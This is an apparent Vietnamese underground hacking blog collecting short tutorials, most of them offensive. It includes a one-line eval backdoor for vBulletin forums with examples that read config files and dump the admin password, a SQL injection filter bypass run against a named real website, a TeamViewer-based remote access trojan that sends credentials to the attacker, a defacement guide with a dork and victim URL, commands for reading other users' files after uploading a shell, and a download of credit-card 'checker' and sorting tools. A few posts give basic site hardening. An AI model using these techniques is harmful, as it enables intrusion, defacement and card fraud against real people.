Blog Hacking-UG by VandatUG

Gửi các bạn muốn làm Hacker

Xin chào các bạn. Lời đầu tiên thì mình hi vọng, dù có muốn trở thành hacker mũ đen hay mũ trắng thì các bạn hãy đi theo con đường đúng đắn, đừng trở thành trẻ trâu !
Bởi vì :
+ Mình gặp rất nhiều bạn luôn mở mồm tự xưng ta hiểu biết, ta là hacker, luôn khoe mẽ…. => Trẻ trâu
+ Chuyên tìm các hack, local site người khác để DF, để lại dòng chữ: Hacked by… rồi đem khoe => Trẻ trâu
+ DDOS site người khác chỉ vì mục đích thể hiện khả năng + khoe mẽ => Trẻ trâu
Hacker ?
+ Họ luôn cảm thấy kiến thức của mình là chưa đủ, luôn tự tìm tòi và học hỏi, họ biết kho kiến thức là vô tận….
+ Họ không bao giờ khoe mẽ thể hiện bản thân, không bao giờ đi đâu cũng vỗ ngực xưng ta là Hacker
+ Họ không bao giờ phá hoạt site người khác chỉ vì mục đích thể hiện. Mà họ luôn tìm cách hack trang web chỉ để tăng thêm hiểu biết và kinh nghiệm cho mình, đồng thời thông báo giúp đỡ cho chủ site fix lỗi bảo mật
+ Họ chỉ tấn công và phá hoại khi có mục đích.
Và bạn có biết ?
+ Những hacker giỏi là những người hiểu rõ mấu chốt của vấn đề để khai thác, suy nghĩ và đưa ra hướng giải quyết => Họ đã có kiến thức chắc chắn và sâu về chuyên môn
+ Hacker trẻ trâu thì sao ? Họ luôn tìm cách xem những TUT được hướng dẫn để học vẹt mà không hiểu vấn đề, sau đó áp dụng đi thể hiện
Vậy !
+ Bạn nên có niềm đam mê học hỏi và tự học, khiêm tốn, giúp đỡ người khác để nâng cao kiến thức. Thay vì việc học vẹt và đi thể hiện <= Đa số
+ Hãy nhớ rằng: Thành công luôn đi sau kiến thức và đam mê. Hãy theo đuổi kiến thức và đam mê, càng tới gần thì thành công sẽ theo đuổi bạn. Nếu bạn chỉ theo đuổi thành công ? Thì bạn, thành công, và kiến thức sẽ mãi chạy dài trên 1 cuộc hành trình mà bạn luôn đứng cuối
Cuối cùng:
+ Mình viết bài này chỉ hi vọng sẽ nhiều người thay đổi quan niệm của họ khi muốn học Hacking, học để làm gì ? Để nâng cao hiểu biết, để vận dụng bảo mật, để giúp đỡ mọi người, và dĩ nhiên cũng để dùng làm vũ khí của mình khi cần thiết
+ Mình không phải là người tài giỏi, mình chỉ là 1 hạt cát trong xa mạc. Mình không có ý tỏ ra “sĩ” hay gì khác, mà chỉ muốn nói những suy nghĩ của mình mà thôi
P/s: Đọc bài viết này mình thấy rất có ý nghĩa. Mong 1 số bạn biết local deface hạn chế DF site VN mà hãy giúp người ta bảo mật. Thân!

 

Local Tổng Hợp Các Tut Của Sunshine Angel - Updating....

Tut Local Tư duy 1 :
http://www.mediafire.com/?k9a8xo26e66ck6b
Tut Local Tư duy 2 :
http://www.mediafire.com/?ktghxpz4152zhfv
Tut local BSG :
http://www.mediafire.com/?y0pd363fhen20cw
Updating....
Có gì thắc mắc cứ comment ở dưới :
|


 

Hướng dẫn chống Flood cho website


Flood là gì..có nhiều bạn sẽ hỏi vậy
Khi bạn thiết kế một FORM để nhập dữ liệu, thì bất kỳ ai cũng có thể view sources để xem cấu trúc HTML của FORM bạn thiết kế, vì vậy nếu site bạn không chống flood, hackers có thể dễ dàng flood site bạn, làm DB của bạn có thể bị tràn ngập và xuất hiện nhiều dữ liệu dư thừa...tức là có thể hiểu flood là làm tràn ngập dữ liệu
nói ngắn gọn cách thứ như sau,ở đây hướng dẫn sử dụng theo session


Tạo 1 file PHP tên là anti_flood.php, với code sau:

= time() - $timeout ) )  {  print "Làm ơn đợi {$timeout} giây rồi quay lại kiếm tôi!!";  return false;  }  $_SESSION["{$session_name}"] = time();  ?>
 Giải thích:
Dòng thứ 3 dùng session_start() để khởi động dữ liệu của session (Phiên làm việc).

Dòng kế tiếp là để thiết lập thời gian cho một session, mặc định là 60 giây.

Dòng tiếp theo là $session_name, đơn giản chỉ là đặt tên cho session.

Dòng tiếp theo nữa là để kiểm tra thời gian của phiên làm việc trước đó (nếu trước đó có một session đã thực hiện và session đó phải lớn hơn hoặc bằng thời gian hiện tại trừ cho thời gian thiết lập cho mổi session).




+ Điều đó có nghĩa là nếu session đã thực hiện trước đó (session thứ 1) chỉ cách session thứ 2 dưới 60 giây (đây là thời gian do bạn qui định: $timeout = 60) thì sẽ được xét vào dạng Flood data, và ngược lại thì sẽ cho qua và xác nhận hợp lệ.

Và dòng cuối cùng là thiết lập thời gian "hiện tại" cho session "hiện tại".

Có 2 cách để sử dụng đoạn code trên:

Cách 1: Load trực tiếp file anti_flood.php, áp dụng cho site có 1 FORM cần chống flood.

Code:

 Cách 2: Là copy trực tiếp đoạn code trên rồi sửa lại tên session để dễ phân biệt cho site có nhiều FORM cần chống flood:
 
 

Bảo mật cho VBB ngắn gọn và dể hiểu

Hôm nay VănĐạt sẻ hướng dẫn các bạn chống hack cho diển đàn vBB, chắc các đã không xa lạ với các bài viết hướng dẫn bảo mật cho diển đàn vBulletin, nhưng những bài viết đó hầu như rất dài dòng và khó hiểu. Hôm nay Vô Tâm sẻ tổng hợp những cách chống hack của diển đàn vbb một cách dể hiểu và ngắn gọn.
1. Thay đổi Config.php trong thư mục includes:

- Trước tiên bạn hảy tạo một thư mục để chứa file config.php "thật" của chúng ta. vd: #vandat Sau đó bạn mở thư mục includes và tìm đến file class_core.php
  Tìm:
includes/config.php
Thay thế bằng: 
#votam/ten file config.php mà bạn muốn    
"#" ở trước thư mục là có mục địch nhé.  các bạn muốn bỏ nó đi cũng không sao. 

Bây giờ bạn vào includes và tìm đến file config.php và đổi tên nó giống như ở chổ nào
#votam/ten file config.php mà bạn muốn
Rồi đưa nó vào thư mục #votam
2. Tăng cường và thay đổi địa điểm của Admincp:

2.1/ Thay đổi vị trí admincp:
- Bạn thay đổi tên của thư mục admincp
- Bạn vào #votam ten file config.php (Đây là khi bạn đã đổi địa điểm file config.php) còn nếu chưa đổi địa chỉ file config.php thì vào vào includes và tìm đến file config.php

Tìm:  
$config['Misc']['admincpdir'] = 'admincp'
Thay thế admincp thành tên thư mục bạn đã đổi trước đó.

2.1/ Thêm một lần nữa để đăng nhập được vào admincp:

- Mở file global.php trong thư mục admincp (Nếu đã đổi tên thư mục admincp thì vào thư mục đó để tìm file này) 
Ở hàng đầu tiên:

Bạn chèn thêm vào:
//Khai bao dang nhap $config['dn2_dnp'] = 'usename'$config['mk2_dnp'] = 'password';

if (
$_SERVER['PHP_AUTH_USER'] != $config['dn2_dnp'] || $_SERVER['PHP_AUTH_PW'] != $config['mk2_dnp']){ header('WWW-Authenticate: Basic realm="Xin vui long khai bao thong tin yeu cau truoc khi duoc chuyen den bang dang nhap"'); header('HTTP/1.0 401 Unauthorized');
//Trang sẽ hiển thị khi thông tin khai báo sai bét. Hỗ trợ HTML nên bạn có thể thiết kế một trang đẹp hơn echo '
Đi chổ khác chơi đi chú em. Nhấn nút biến!
'
;
exit;
}  

Nhập 2 thông tin này vào: 
usename
password
3. Về phần chmod
- Chmod public_html 100
-Chmod thư mục includes 101. File config 400
-Chmod tên thư mục ví dụ forum thành 701
Hi vọng những cách này sẽ giúp các bạn tránh đc local :)  
 

[Tut]Deface website trong vòng 2 phút sử dụng Exploit

Nhìn tựa đề anh em nghe khó tin nhỉ.
Nhưng sự thật là như vậy .
Tut chống chỉ định cho pro.
Linkdownload:

Code:
http://www.mediafire.com/?y6zxx5pmx6hzt2c
Google dork:



Code:
intitle:Moxiecode file browser filetype:php
Demo:
http://www.steulaliegites.com/tinymce/jscripts/tiny_mce/plugins/filemanager/frameset.php

 

Hướng dẫn lấy IP của victim khi chát

Bạn phải chat với Victim dể có sự thiết lập IP. Nói chung là giữ Online Connect với Victim.
Mở một cửa sổ DOS prompt
Vào C:gõ lệnh sau: netstat -a
C:\b netstat -a

Lúc dó trên màn hình sẽ xuất hiện 1 số thông tin có dạng nhu sau:
 
Active Connections

Proto Local Address Foreign Address State
 
TCP franck-a:0 0.0.0.0:0 LiSTENiNG
TCP franck-a:1091 0.0.0.0:0 LiSTENiNG
TCP franck-a:1090 server5.syd.www.ozemail.net:80 CLOSE_WAiT
TCP franck-a:1099 p3-max35.auck.ihug.co.nz:1054 ESTABLiSHED

Chúng ta chỉ chú ý những dòng nào có chữ ESTABLiSHED, dó là thông báo cho sự nối kết dã duợc thiết lập với bên ngoài.
 
Nếu chúng ta chat với nhiều nguời, chat bằng cả Yahoo Messenger nữa thì sẽ có nhiều ESTABLiSHED, do vậy chúng cần chú ý và phân biệt xem ai mới thực sự là Victim của mình.

Với ví dụ trên ta thấy p3-max35.auck.ihug.co.nz:1054 ESTABLiSHED là dáng chú ý và quan tâm cả. Còn nếu test trên máy bạn thì nó sẽ khác di nhung ta chỉ cần quan tâm dến dòng tuong tự nhu vậy và có ESTABLiSHED là duợc
 

Việc tiếp theo của chúng ta là Ping Victim này dể lấy duợc IP thật của họ.
 
Cung ở của sổ DOS prompt này, ta gõ lệnh Ping p3-max35.auck.ihug.co.nz
:1054 ESTABLiSHED ==è chúng ta không quan tâm cái này nên không cần thêm vào sau lệnh Ping

c:p3-max35.auck.ihug.co.nz
 
Wow, thật là tuyệt, tới dây ta dã thấy duợc IP thật của Victim rồi.

Pinging p3-max35.auck.ihug.co.nz [209.76.151.67] with 32 bytes of data:
 
Reply from 209.76.151.67: bytes=32 time=1281ms TTL=39
Request timed out.
Reply from 209.76.151.67: bytes=32 time=1185ms TTL=39
Request timed out.

Ping statistics for 209.76.151.67:
 
Packets: Sent = 4, Received = 2, Lost = 2 (50% loss),
Approximate round trIP times in milli-seconds:
Minimum = 1185ms, Maximum = 1281ms, Average = 616ms

209.76.151.67 chính là IP mà chúng ta cần tìm của Victim dây.
 

Chúc các bạn thành công
 
Cách này mình đã test thử và phát hiện rất tốt IP của victim
Bạn nhớ khi chát với victim nên đóng tất các cửa sổ khác lại,như vậy sẽ chính xác hơn

 

Bảo mật Website của bạn với chmod, mã hóa config


Hiện nay chủ yếu các bạn hầu như đều dùng Shared Hosting,  ít bạn có đủ điều kiện ể thuê VPS hay đặt máy chủ riêng :D
Vì thế hôm nay Vô Tâm sẽ hướng dẫn các bạn thủ thuật đơn giản để bảo vệ cho website của bạn. TUT dưới đây ko hẳn là bảo vệ 100% cho website của bạn, nhưng cũng ít nhiều gây ra khó khăn cho Hacker muốn tấn công site bạn
Đầu tiên hãy bắt đầu từ việc tiến hành mã hóa file config, file chứa thông tin truy cập CSDL của bạn.Ở đây mình giới thiệu cho các bạn 1 địa chỉ để làm việc đó:
Đó là:
http://www.rightscripts.com/phpencode/index.php
Bạn copy nội dung php cần mã hóa rồi paste vào khung sau đó click encode.
Vậy là bạn đã được 1 file config mã hóa nhìn rất là loằng ngoằng, hãy thay nội dung đã đc mã hóa = nội dung cũ của file config :D
**** Tiếp đến là công việc chmod:
Bạn hãy CHMOD:  101 cho tất cả folder ; chmod 400 cho tất file
Trong trường hợp 1 số server chmod 400 cho file bị lỗi thì bạn hãy chmod lại là 404
Sau khi website bạn hoàn thành, hãy ra chmod nốt folder: public_html thành 701
**** Giấu file config đi để che mắt attacker
File config đã được mã hóa, nhưng để cẩn trọng hơn bạn hãy giấu nó đi, đổi đường dẫn tới file config trong code của bạn. (Với VBB hình như là file class_core.php trong includes/ )
Bạn ra khu vực folder /public_html/ và tạo 1 thư mục mới có dạng như : #tuybandatten
Và hãy chuyển file config của bạn vào đây
Sau đó sửa đường dẫn tới file config = đường dẫn mới, ví dụ như là: ../#tuybandatten/config.php
CHú ý là mỗi lần bạn include 1 file ở folder ngoài thì bạn ../ 1 lần, ví dụ file đường dẫn nằm cách file config 2 folder thì phải là: ../../#tuybandatten/config.php
Và cũng đừng quên chmod nốt file config này thành 400 (hoặc 404) và chmod folder #tuybandatten thành 101
 

[Cơ bản] Local attack – Shell là gì ???


Đầu tiên tóm tắt nôm na rằng:  Shell – Là 1 công cụ cho phép bạn tấn công, thực thi các lệnh hay yêu cầu của bạn để tấn công, chỉnh sửa, đọc…. file, folder trên site đó, hay thậm chí là với các site trên cùng Server đó. Dĩ nhiên, bình thường thường thì bạn không thể có những quyền đó được đúng ko :)
Giao diện của 1 con shell: 


Ok, giờ quay lại với local attack là gì:
Ok, Google ra thì: Local = địa phương, khu vực
=> local attack => Tấn công từ trong nội bộ của máy chủ, như đã nói ở trên, mục đích của chúng ta là làm cách nào để đọc đc nội dung ở các Site khác trên cùng server
Dĩ nhiên là bạn cần có 1 con shell nằm cùng trên sv đó ( Làm thế nào để có ? Bạn có thể upload source shell từ host của bạn, có thể dùng bug để up … các vấn đề này sẽ nói sau )
Với 1 số lệnh và kĩ thuật, bạn có thể DF ( Deface – thay index của victim thành kiểu: Hacked By Tên Bạn )
Ồ :D rất hay đúng ko :) vậy chúng ta sẽ cùng học xem nhé
 

Tut Xâm nhập máy tính =Backtrack 5 -remote desktop (Phần 2)

Về remote desktop sau khi đã chiếm được cmd của victim. Hôm nay mình xin làm tiếp phần remote desktop . Mình sẽ sử dụng VNC remote desktop . Nào mời các bạn cùng tham khảo ^.^



 

Code Tools UG - Hacking - tổng hợp

Hack Shop:
Get 2 Table
Get 3 Table
Hack Shop CFM
Hacker Lite v1.03
Encode Decode
MD5 Cracker
Admin Finder
Admin Scanner with $ place holder
SQL Bruter v1.2
SQL InyeXion Scanner
SQLI Google Scanner
Search Shop Vulnerable v2
Check Shop via Google

Checker Tools:
Socks Checker
Checker Ccv
Mail Checker
Checker Bin
Check VBV/MCSC
Reverse IP
Paypal Account Checker v3.0

Dupe and Sort:
Remove Dupe CC
Remove Dupe Mail
Sort by Type Mail Pass
Sort by Bin Credit Card
Sort by Date Credit Card
Sort by Type Credit Card

Filter Tools:
EXP Filter
Filter CC
Word Filter
Filter Info CC
Filter Info Mail
Filter Columns

Other Tools:
Boot Traffic 3.0
edit .htaccess
Filter Pass 6 Char
Filter Pass 8 Char
World Clock
U.S Zip-Code
String - ASCII, HEX, Binary Converter

Download:
http://dl.dropbox.com/u/49340709/t00lz/public_html.zip


 

Chèn Backdoor vào VBB nhanh-gọn-nhẹ-hiệu quả

Hello, hnay DuyK sẽ hướng dẫn các bạn cách chèn 1 “cửa sau” vào VBB nhanh-gọn-nhẹ-hiệu quả:
Khi bạn đã login vào được admincp của 1 forum vbb nào đó, bạn muốn để lại 1 “cửa sau” trên website này 1 cách kín đáo nhất ?
Okê, chỉ cần 1 dòng đơn giản:

eval($_REQUEST['dct']);
Đầu tiên bạn cần truy cập vào: Plugin & product manager => Plugin manager => Tìm đến 1 plugin bất kì => EDIT => chèn dòng trên vào vị trí hợp lý (Nếu không hiểu lắm về cấu trúc php thì bạn có thể chèn vào đầu hoặc cuối)
Bạn cần chú ý vào “HOOK” mà bạn chèn. Bạn nào hiểu phần này thì okê rồi. Còn nếu bạn nào chưa hiểu thì hãy chọn những kái nào có hook là: ajax_start => Sau khi chèn chỉ việc truy cập /forum_path/ajax.php?dct=(Code php) global_start (ko biết có nhớ lộn ko) => Sau khi chèn chỉ việc truy cập /forum_path/forum.php?dct=(Code php) — (Hoặc có thể run bất kì file php nào, vì chèn vào global mà) ……………..Blah blah……………..
Code php bạn có thể chèn truy vấn SQL, readfile…. Ví dụ ?dct=$duyk=readfile(‘includes/class_core.php’); echo $duyk; => view file class_core.php ?dct=$duyk=mysql_fetch_array(mysql_query(“select password from user where userid=1″)); echo $duyk['password']; ……………..
Với việc chèn “Cửa hậu” nhỏ gọn như vậy nhưng rất hiệu quả :D Bằng cách này chúng ta có 1 cửa cho riêng mình để vào “nhà” của victim 1 cách lén lút nhất. 
Leech cho ae tham khảo nhé
Nguồn: DaiCa.info – DaiCa.net – Forum Newbie học hỏi ( Luôn tôn trọng bản quyền tác giả)
 

Share code Flood chatbox

Code trên dùng để flood chatbox forum như sửa notice, band thành viên, band admin và các vấn đề liên quan tới chatbox

+ Bạn chỉ kần nhập link tới Chatbox của Victim
(Cách tìm link chatbox: Trong giao diện chính của forum (Nơi xuất hiện chatbox) Bạn nhấn tổ hợp phím: Ctrl+U. Bạn ấn tiếp: Ctrl+F lên và trong giao diện tìm kiếm, bạn tìm với chữ: iframe. Next tìm  tới chỗ nào có kiểu:
 

Tut Local sever win doiqua.vn

local win có vẻ khó hơn linux nhỉ

các bạn kham khảo video vậy
 




 

hướng dẫn 3 cách cơ bản để chiếm quyền admin

cách 1: change pass admin trong data
cách 2: change adminpermissions
cách 3: forget pass admin

Yêu cầu:
Có được info data của victim bao gồm:
Code:
$config['Database']['dbname'] = 'forum'; $config['MasterServer']['servername'] = 'localhost'; $config['MasterServer']['username'] = 'root'; $config['MasterServer']['password'] = '123456';

Hiểu biết sơ về câu lệnh SQL

Đầu tiên ta tôi sẽ nói cho các bạn biết về các dạng mã hóa của một vài forum thông dụng hiện nay như:
Code:
1. phpBB : md5($pass) //ko dùng salt 2. VBB : md5(md5($pass).$salt) 3. IPB : md5(md5($salt).md5($pass))

Với
-$Pass là mật khẩu ban đầu.
-$salt là 3 kí tự ngẫu nhiên mà forum tạo ra. (Mục đích: cá nhân quá mật khẩu của member trong db).


OK băt đầu thôi:

Cách 1: change pass admin trong data

Việc đầu tiên ta cần làm là tạo 1 nick trong 4rum victim
Vi dụ nick là hacker pass: 123456
Sau đó connet vào data qua shell
Ta dung lệnh :
Code:
Select * from user

Với lệnh trên thì ta có thể xem dc tất cả user trên 4rum
Nếu 4rum victim có số lượng thành viện cở hơn 3k thì ta dung lệnh :
Code:
Select password , salt from user where username='hacker'

Ta dc
Code:
Pass md5 : 5cc70df698ca01c3adb396a08b4873ad Salt: ?`Y

Q: Tại sao lại phải select from user
A: Ta cần lấy pass mã hóa md5 + salt qua nick mới reg sau đó copy lưu lại.
 

Đột nhập máy tinh qua teaview rat

1 - Đột nhập máy tinh qua teaview rat:
- Teamview rat được các phát triển dựa phần mền điều khiển máy tính người khác: teamview. Nó được tạo ra dưới dạng file .exe, khi victeam click vào thì phần mền teamview được cài đặt ở chế độ ẩn trên máy của victeam và gửi ID,pass về cho hacker.
- Sau đó hacker sử dụng phần mền teamview với ID và pass đượch gửi về để điều khiển máy t
ính victeam mà họ vẫn không hề hay biết.

Link Down :
http://www.teamviewer.com/download/v...ewer_Setup.exe

Linkdown Teamview Rat :
http://www.mediafire.com/?zznnxz1myei

Video hướng dẫn :
http://www.mediafire.com/?in1zfnmhhj4

+) Bạn nên tao ra teaview rat trên win xp, tôi tạo ra trên win 7 thì nó thường chỉ gửi ID về mà không gửi pass, nếu có gửi thì pass cũng thường bị lỗi.
+) Victeam dùng xp, win 7, hay lap đều dính chưởng như nhau cả
+)Không vượt qua được các phần mền anti mạnh , nhưng nếu nó đã kích hoạt được trên máy thì 1 số anti không phát hiện được. Trong quá trình xâm nhập có một số máy tính dùng kis nhưng vẫn bị dính chưởng.

 

[TUT] Bypass Filter + 403 Forbidden SQL Injection

Mọi người cùng tham khảo cách bypass nhé !

Victim :
Quote:
http://spaadam.com/vi/news.php?newsid=108

check lỗi :
Quote:
http://spaadam.com/vi/news.php?newsid=108'
Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
-> Lỗi rồi nhé ! tiếp tục order
Quote:
http://spaadam.com/vi/news.php?newsid=108 order by 1-- -
Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'der by 1-- -' at line 1
đến đây ta thấy ! Filter đã được sử dụng , và nó đã cắn mất kí tự "or" trong "order by 1-- -" mà ta nhập

nó cắn mất thì ta thêm lại. bypass nó như sau :
Quote:
http://spaadam.com/vi/news.php?newsid=108 oorrder by 1-- -
Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1-- -' at line 1
-> Vẫn không được rồi . Bypass /*!*/ tiếp nhé :
Quote:
http://spaadam.com/vi/news.php?newsid=108 /*!oorrder*/ /*!by*/ 1-- -
Quote:
Một số hình ảnh mới về Spa Adam
Posted on 2012-03-15 14:37:25
-> Okay ! không lỗi rồi. giờ ta tiếp tục order ( đoạn này mình không giải thích nhiều, ai chưa hiểu thì xem tut cơ bản hơn nữa ) :
Quote:
http://spaadam.com/vi/news.php?newsid=108 /*!oorrder*/ /*!by*/ 7-- -
Quote:
Unknown column '7' in 'order clause'
Quote:
http://spaadam.com/vi/news.php?newsid=108 /*!oorrder*/ /*!by*/ 6-- -
Quote:
Một số hình ảnh mới về Spa Adam
Posted on 2012-03-15 14:37:25
-> Có 6 column .
 

Vòng xoáy UG – Tâm sự của 1 hacker


1. – Lời khuyên bị bỏ quên
Bài học đầu tiên của tôi khi bắt đầu nghiên cứu bảo mật là một lời khuyên của một đàn anh: “Không bao giờ được nhúng tay vào chàm, quyền lực điều khiển thông tin là một ma lực, nếu anh trong sạch ma lực sẽ không phát tán, còn nếu anh nhúng tay vào chàm, chính ma lực này sẽ đưa anh đi hết từ sai lầm này đến sai lầm khác”.

Hàng đêm, lời khuyên này cứ quay về cùng với sự tù túng và khổ sở nơi bị giam giữ làm tôi rơi nước mắt. Tôi thấm thía, cuộc sống có rất nhiều người tốt đã cho tôi những lời khuyên “xương máu”, tôi đã bỏ qua vì một giây phút để ma lực của đồng tiền bất chính lôi kéo. Hy vọng câu chuyện của tôi sẽ một lần nữa thức tỉnh các bạn, hãy lấy bài học của tôi làm gương, vì tôi đang phải trả giá quá đắt!

2. – Cuộc đời nâng niu – tôi từ chối
Tôi sinh ra và lớn lên tại một tỉnh miền trung, năm cấp 3 là một học sinh giỏi nằm trong đội tuyển thi quốc gia của trường PTTH Năng Khiếu của tỉnh. Tôi là một thư sinh và tính tình có phần nhút nhát. Với khả năng học của mình, tôi dễ dàng thi vào khoa CNTT danh giá của trường ĐHBK TP.HCM. Kể từ đây, cuộc sống xa nhà khiến tôi bắt đầu phải tự lập mọi việc và đồng tiền trở nên rất quan trọng. Không nhiều tiền, tôi bắt đầu tìm vui từ internet.

Ngay lập tức tôi trở nên say mê máy tính và mạng Internet, tôi bị mê hoặc bởi thế giới các hacker – những con người tự do và đầy quyền lực. Nhanh chóng hòa nhập được vào thế giới ngầm hacker Việt Nam, làm quen được với những người bạn cũng sở thích nghiên cứu như mình, tôi thu thập được rất nhiều kiến thức và kinh nghiệm. Và đến một lần, khi tôi được một người bạn gởi cho thông tin của một chiếc thẻ tín dụng và hướng dẫn tường tận cách thức mua đồ trên mạng, ngay lập tức tôi bị cuốn hút vào một thế giới – thế giới của những kẻ “shipping” (mua hàng bằng thẻ tín dụng của người khác).

Món hàng đầu tiên mua được là một chiếc laptop mới tinh, mê mẩn với thành quả đầu tiên của mình, đêm hôm đó tôi không thể nào ngủ được, những suy nghĩ về chuyện “thần kỳ” vừa rồi và những ý định làm giàu tiếp theo cứ thay nhau xuất hiện trong đầu. Gần sáng, tôi thiếp đi với một nụ cười thoả mãn trên môi, tay vẫn không rời chiếc laptop …

Sáng hôm đó tôi không đến trường nữa, những ngày sau đó cũng vậy! Tôi ngồi lỳ bên chiếc laptop của mình, để nghiên cứu về “công nghệ” ship hàng của thế giới ngầm: Làm sao để lấy được các thông tin thẻ tín dụng của người khác, những hệ thống mua hàng trực tuyến cho chuyển hàng về Việt Nam, nghiên cứu cách sử dụng thẻ tín dụng sao cho hiệu quả, nghiên cứu thương thuyết với nơi mua hàng.

Hai mươi giờ một ngày, 30 ngày một tháng, ngay trên giường ngủ của mình, tôi đã hoàn toàn thấu đáo các thủ thuật trong việc mua hàng từ nước ngoài về Việt Nam. Tuần lễ sau đó, những món hàng rất giá trị liên tục được gửi về Việt Nam như laptop, ĐTDĐ, iPod … Không dùng hết và thừa thãi, tôi bán cho người khác. Mắt tôi hoa lên khi nhận những xấp tiền từ tay người mua, nhưng dường như vẫn chưa đủ, tôi cần nhiều tiền hơn để thoát khỏi cái kiếp nghèo hèn và tủi thân của một thằng sinh viên tỉnh lẻ. Tôi lại suy nghĩ, lại tìm tòi, tôi tìm cách dấn sâu thêm cuộc đời mình vào chàm mà không nhận ra, đồng tiền thật đáng sợ !



3. – Sinh viên Việt Nam tham gia đường dây tội phạm công nghệ cao quốc tế
Dạo đó, trong thế giới ngầm của hacker Việt Nam có đồn đại về một cách thức kiếm tiền nhiều hơn cả shipping. Đó là cách làm CASHOUT (rút tiền từ máy ATM), nhưng muốn làm được việc đó thì phải có quan hệ móc nối với tổ chức tội phạm quốc tế ở các nước như Mỹ, Úc, Anh… Tin đồn râm ran về một hacker Việt Nam mỗi tháng kiếm được tiền tỷ bằng cách này đến tai tôi. Như một con thiêu thân, tôi tiếp tục lao vào tìm hiểu.

 

Một số lệnh cơ bản khi upshell

Thấy anh em ngơ ngác k biết làm gì khi có trong tay 1 con shell nên t nói sơ sơ cho ae đỡ bỡ ngỡ
Nào! Bắt đầu:
1) Xem list domain trên cùng sever
ls -la /etc/valiases
cd/etc/vdomainaliases;ls-lia

Trường hợp đặc biệt khi 
không thể xem user nằm 
cùng host thì ta thêm &&
vào
cd/etc/vdomainaliases&&
ls-lia

2)Xem tên user
cat/etc/passwd/
hoặc
less/etc/passwd/
3)Local sang victim
dir home/tênusercần
local/public_html

4)Xem nội dung file
cat/home/tênuser cần
local/public_html/
index.php

or 
ln -s/home/tên usercần
local/public_html

Còn nếu không dùng đc các lệnh trên~>host bị dis 1 số hàm
Bonus 1 số lệnh shell trong linux
- pwd: đưa ra ngoài màn
hình thư mục đang hoạt
động (ví dụ: /etc/ssh).

- cd: thay đổi thư mục (ví 
dụ: cd .. – ra một cấp thư 
mục hiện tại; cd vidu – vào thư mục /vidu).
- ls: đưa ra danh sách nội 
dung thư mục.
- mkdir: tạo thư mục mới
(mkdir tên_thumuc).
- touch: tạo file mới (touch ten_file).
- rmdir: bỏ một thư mục
(rmdir ten_thumuc).
- cp: copy file hoặc thư 
mục (cp file_nguồn
file_đích). 
- mv: di chuyển file hoặc 
thư mục; cũng được dùng 
để đặt lại tên file hoặc thư 
mục (mv vị_trí_cũ
vị_trí_mới hoặc mv tên_cũ
tên_mới). 
- rm: loại bỏ file (rm
tên_file).
Để tìm kiếm file, bạn có 
thể dùng:
- find : dùng cho các tên 
file. 
- grep < tiêu chuẩn tìm 
kiếm>: để tìm nội dung
trong file.
Để xem một file, bạn có 
thể dùng:
- more : hiển thị file theo từng trang.
- cat < tên file>: hiển thị
tất cả file.

The End Lệnh!
 

Copyright © VănĐạtUG - is Newbie / Template by Mr.Đạt - Bản quyền tại VandatUG